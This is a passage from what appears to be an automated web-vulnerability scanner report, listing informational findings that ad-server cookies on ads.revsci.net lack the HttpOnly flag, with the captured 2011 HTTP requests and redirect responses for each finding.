User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_Ue6V="MLsfsF8OZi5n4JASs5Bk9KNTJTvS8f2Fu11GHPEzhKyi3GQrQ7BmTve2OJAm5dkicVDq6exz8/7mVp8gLWwFrCZXqjnrP4dY+oskzV6Lm6fDGU/pc7sD4QgyAm917NYUdYZyl4Ge77s9UIFZQ17LzY6FmFr+dbOm/q3NRviYsxYxEdT4BuWckICBhlynfvy70YiGCMlO6qasmF2ihg+pO2oJnW6u/sK+jrGeJcPD5bkfmxdZkcxFCdRcP+5WTqdsCmcLf0Ex4rcKXrvjrnu0sTHtBT5McF9fDxSJ/5F4rhGctF7ufabWD//giGZVhajmlKJ5/ghKjM+xp5IlgyRWbpVdfNtrcTGZkm4rs+yrKxT60qWH9+m+GDthRw4NqX5srVtjKqBYmXFoYwBh69bL8neIN/fo324IeUZkNTAbckLX2a5MG66S3qymz5fMI7YY007gYORN"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ue6V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L-X0="MLsXsF8OZi5n4BC7CEQANzy/1tkH/1R6T7S5z2Fu/1ZdyDcMqjB3UfR+EgHU8X4ksrVgy/Rz8x5trlkaRECoNMLefiivRJt2FSces26J094xJ83B/839DFleaBDLRohSlAV8cpPInIvVz89Y7xsejcWODt9R/gyFvKssIz6J1ZKnfIDZnh498xJl7+/KNV8X6NaOn5sOc/2crutdINmb6SjYm5/o39bKqJ3lsv/ufqykgLW6bFGCdxMIct6rbb03ZFShfm9rBIi4EFNh71KUzfigSzTGIl979lRdhOaxbsRsHH/IHdX3B6eZu5yScSdoRXhv4T+NLxAHJeaSWhd2iSuscBVEm14yRic99IhVBxJCQAQfxVHWrrWMmcSIot2Xc9zXZmllbUJ5MUniuwtpDzfMfJGkIdV2LYIBTuaw56nZrsRqAQQu1rdWet9dyZycwRd1bxIYIaFo+WI="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1052401&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:58:30 GMT


13.59. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsiPus_8Tdl and rsi_us_1000000, both with Max-Age=1009152000 (about 32 years); the earlier rsi_us_1000000 and rsiPus_TuCq cookies are cleared first on both the /adserver and / paths. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNcDPB7QMUFVJmHElW1WAhFpB0I5EmV+QHrdRrcAMkOX+o7LQjAQv0aGumjYcA+pD55MfuOfQbGooH3qorp++zHuX/61m4ao1z4yL4Lb3cyf2EkQb/3ZOSwdnh6MSu2Um4QVZJKClGNz2Fl9QeLKxco3pM/j3xxqXi/RBfDYQLHw069nJi4GhHujSDyULrAXw98qMzqzoEqWE=; rtc_6axN=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; rsiPus_TuCq="MLsXsF/uIS5npgAHiuo+xaAquFHWxLtwUwyTL1XC//hXGJaixt9neOzmYVtifz75nnrUC8ggvkGWKGkwE/VBlME+Q/z1CJ1IxSZ/i6GAWifDGU/pc7sD4QgyAm917NYUdYZyh7iBzZslsIabjNz4MeyillaRjQ2YsKPNRrjQY7vW1DkdAuWciLCBhlz/wrCGW8vuVAft0pSKk9JA2l6FMhjfXYeZuIYTQXTpgQkcMpDks5HxwOfsvpsaEL2NaEL8Yclw+0VwG7q3HFFj76/OIf0IMyUZCEcOHojowzGhV8ioE5aV2ws2hZ0IhhV8uOQHffx8KV33w+vWfAfqWVYrunKd0UvFGhzqCyNSeiFSR238HKp/W2VSXnq3hodOv2LuKf+45Dap1xZrLzh5Gi5QTzedauVd/OhMDVTGxhMIICko4xgErqrMKnEgSt2qIeDrG7gw738="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TuCq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Tdl="MLsfsN8vLi5noAD7UlKmCeGhAP46rO3VGVkG3cTC//hXKAVhzgsM6n2u8NRAWCkwlkp7R909rxgJCSUtdP90+WpBKh3IxnnSa60vjSMgeM3M44P2Q1ZKaAXQA4Udgxl7mFn8VFA6ipHDpoTUG7C9O4Pgwrt6fMYG/9KOBspe5ouFNDa0I7gFKjQsrEteLApaz6BmjLdCFyzK2wedlrfj6DaeG4uph8ScspDLsRtN7zgovFWn//4xxFM0gmMmOEDx6mFpU1ph1l7pmfjORzRcqnchOSoFOGsUDQhhACxTEZ4J13w5/3NSjHEjPNR07flIaq05tjTIfQZutqXMdI6DW89PNtY8I2NGUxNCbLkconRe3ooHr9Swk6WnhMhNRTkI5FBYw1wZ9yH3LpE69Xhru4gA29szeKRgLSKhYqAoD4rBu6sD2BKS56+x62mm6B5tLFus+g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 01:55:22 GMT


13.60. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPF50OBLwIMpzaxu2HQrcQb/coAaHhJAbenh/Nv2MY6n2e1NDCNnYNPat72X0BRE/esU9+EywiROtUTQMbYBq9rnjjNjeUEe32iu1AIHKjKt7Fndxcuv+HBYCNWc2u0r9BSCGY0lWYHj0kddsl153LxKPjEBRX4N7YV+UiL596yc+/XaoxpnMq8ClHjz4GUV1zPVpVxAexnxc2VYk2J5ZWkA6vemmq+Y9/WiNZNbE26sdYD7pwlP0xb58DJLaJ0BMJfjTLY4z5F45OKPR1pmg==; rtc_rnU6=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFukH2RhvePE26HoeBFV5kQJR5W9feBwQwoflnJmU9r6cb2JZX//hGGENc5px9phZOkJGucNggdRkYXvY5K0=; NETSEGS_K08784=d303c7ec11fd6a67&K08784&0&4df176b8&0&&4dcb4af6&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsiPus_2ZJb="MLtHpENqcx5zJhHBQhzgK3He1h3aw0A6X7azDvfHiMlclO1tdu0KektdKeHwXOMUVaY0m0LaKBIUQalgzzr5lW6q66bvi1YGG7mt0omOkv2p3Q6RiqmtjSbwxbOimlKBmUyhIXN9/LP5pQA1ehm/668seCfMvdSvlIxG3tTaJfxJReTn635WKmfzlxcpiRFzYIxojmq5n0Tys9BIlVqMmXcMtRpx"; rsi_us_1000000="pUP1JklHPwIc1Q0VwanxzTdZ2/4zipi5ZKPbd2VLfdV+lkvoeIlE1zSxcznS+KoMhK9YJjmf9c9L18zMUhyaykGFMZvgZU3jUz/3lEOhU8+qOw2xwHoAsehEGwZghimo44CM1p4MyHfzZA4pubseNPAZ4Kq5ZLrL+f2zP54lvTyPjNv5lTWNX3eNlDoYI5sG9IOCN+h++nZnkwV+owEaMWKHRCvMOHtvmIcm+ypY5ReMHXYXlUoOjAl+EMQObFf5oKn272NxtqmL/6LHIlDedDScq+nhOP6NpxNEVO59dmN1MfnbehHp68hDiBM+TmRxuiwlXYMug+KIR0pGFks1aWnkiZuLZPAr9x/5PmrH7yO/xeYpMGHl5ZXnxsnNbTf+L+KFFTnzBb+DMQmY7Xt2MO7m1LJWRIZxrh8jv+ccXEXSLjnwzKY9qynUrWmwVJ+nOQyqEa4OleB/vNRTSKkgls0Lpe2h9As/5kth06ZOY3RR3bruhoruZpRPZnMFnBVLGw/vPThxMoZijl7d9ttwNd2WU7aTfvZuDDtGZBcEVyhi7NEajfyFTDB35Uwu0QI3Ug99pST7MfmQXZVSUeJ7XS1tJSPSDsp8i7ljY13vOyJ7+GDNyblrjs/vDLxJWssKpKc="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2ZJb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vHAg="MLtXrtMvsT9nIAG3VrwFhfjWOcNPjZk2OWir6JCihWxgb9Moc8z8fTq2sJlL/BuYW4dHbu41+HA0cx/jxufMhpPJwuid2e33gSvDA8DuTrJqEkx+6zx+C5wrm15kHKWeC3hvfiGDXE7WOEOayfaDrq0es/h3KKmPVAKrqUDwLP8TFWccB5Vqn1OtBLTOp3vQ2aV2kToAJBEPmTXo4g/gZeiO/iALj+tlFL/yaEo6Fc+NhzVjz577Z9AR/J2JwZe+FB4XdCMXi8XkJdvnLzP+aRWrfgYM7MpbCyZV1MOtgXYdwwy2egw4fNgN4iLyz2kDV9VRwSd6q9dVHChYo01BH0CYjrabX/PwIl41yA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:40 GMT


13.61. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=7050454176496.714?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_eR-U="MLsXsF8ubi5n4JDyzowlaElL3byjGsaEu/PCsfHs+PiZBmLkCOD/CYU4iQ1FIB9JIdEuByvn+LmEbSTfL+ykre7wDUIX/wZ6lnteDZlY2GW0rSpVxafl8+M3Fk56Oh4ptMD+hYqX/cAyWYPZh9GLnbzcK72OcuSYGrrJEpXB+DSR95aZykdxmdsZqoaEFcUJuWv1BvXF/JDG/GCNqis4ms/VQEqjV9l+cBVLcmp3g+IkQxuhqkO4h33GXxQRehGwbDMII/X908qfFBBE/BhoJgSDVTQJgbfrr9VStGZJoYAHBxqDSrtQR7zRdEPW+PODtnDjF0aDwrfsnCXsDZAllz5pIm7H8vTOz6Tp6rXuoEwC4tmm90X2zzZQgJINuTSRjmwwSlO3YJyhcZWsYanJtkzqYPXKdjC1vv14LmMCzQv0FuHGVbAUx1aTy5CEjIMWepRHnGiBj/50"; rsi_us_1000000="pUMdJE1DNwYU1Q0E1idLvS/Qn1LhCaXl4R9qqwYfg6rt2+BCR4J+oeH8rPyHk4Hhw5b9xqtsZIdLnAad3UntXGuWxHrABhvpw7cPDxvXQRN62WmlqhL4fC7+WOSMq+dvWgT4ebPl2lFpJuP7uXyCyqg4XAT44TBqEswHmQT5L4Ra/sPnYBWm9xMVQXMRRKtR9GzhJyZLGjpIBA5vWbPzkqrcTd3qbM08co60XhnAKcmrFRUrEudr+/kKU87L0BiqM70g5syIrFQBrlIuwD70ryaPu2eDT20zv7ah015/q4awN6VJ+8rsxj6XZD+0i84pw6Gy6i8fKsPkE8uNlzhWUSTmQhNHOW+k5ncmOAas7xfJ4rqL6ScIwiRVrTreOaLihWYFvg/BJGpbqqkvRbSEeFyZ5KjlpwyIYLwxe5zlFun9kh5wTX7ejF0QZcJtI9kBsn7Lkf5sMuCroQwb82dLm/jPC6EsMPT0XkFh5S98efmvFzOLVDMbgwQfSeonUcsOVnqT7qVHtsDZmgLzokkYy0LbaRGOiMipFRWwDEj3guK/+YGv/C+2fgu0fiORZyKR3jB4N/e6B32HOXDw9nbXtgxToquUZ0Jbjde1ZEuPl4zBTScNWkKfhPjGddppEEFIZw4zrfFa8LgPIBu67lO4i/5H0GaIz9kpcCmZrWX9vOf1HuNbA/tDWC/dJ/w84saSyOHCom0UPlRlu5gF0gnYI4FXWF36+CMlx16c5rjhTlGIIxRDCjW4DfnlpqP8DtNn6e8e7Hq0kIY5aruJQOtYm8IY63ik0p+xKL6x/CQZu7dhDEdqxpDgMf097hSt8cpxx9qylfs9ZTTUaJbwSuQ9HHojxHU2cjzd2kVEcDjTdtSJ0CXD7BBHwg51a2ApHdMJXw5+CREwr4B3pSD0g24vvqG+sWzcENOyHgGktJc/jU1UciLYFrFNu/IYCUeV/GvJyS0qf6LOzhGDndsN6oL4iKMbxnwWClajU0lGucg1dKqXHu4gd8sp27c/dcEJPiOi9TLtSYHz6A0onmkiY/c0dk/B7LDgldJHmYwSTJ1yHydKsSFjNsXGfGeq"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eR-U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cq85="MLsXsF8ubi5n4JDyzowlSBbxpQnwGsaEu/PC8n+5VFKBZFiot29LyxVRkzZAFjNpcJ1iCf5x8wb47OfER+70+KpE+UnSMkbFSIrdk96nO3UaWMTESWUpK3OqyDwU+EA/5R8Xf2DD8x4RmpjwIzLVwKiwQ3OFNmbSHqqZn5iMigi7JoO6ztNRmL1mxYWhBSC0DILl88ybW6M+cQpWnZDY0MdXGPdCs6Dk6T/5787NFvTrHYiNQkaAQXrvVknibEJ2Q3EEI6eA8RHWXnsWl3dsumEcJ4AZQLWPtn8GUbAKtpnDk4QG8tRZvs9uUMCro5ahZOoKWY/NuurXK+xiuXPUMnMlb9G3jNnS1qDw5q+tUhXm3KfSyzsyTJOTgNUtMpTnWzmQrnEghGoIuyZuaegLwU8Hbd5/IEQzTkZ8de2MzHz5ZbekRfbuw54TFc+0wtgB9f5ZYPt8rOk="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:42:03 GMT


13.62. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8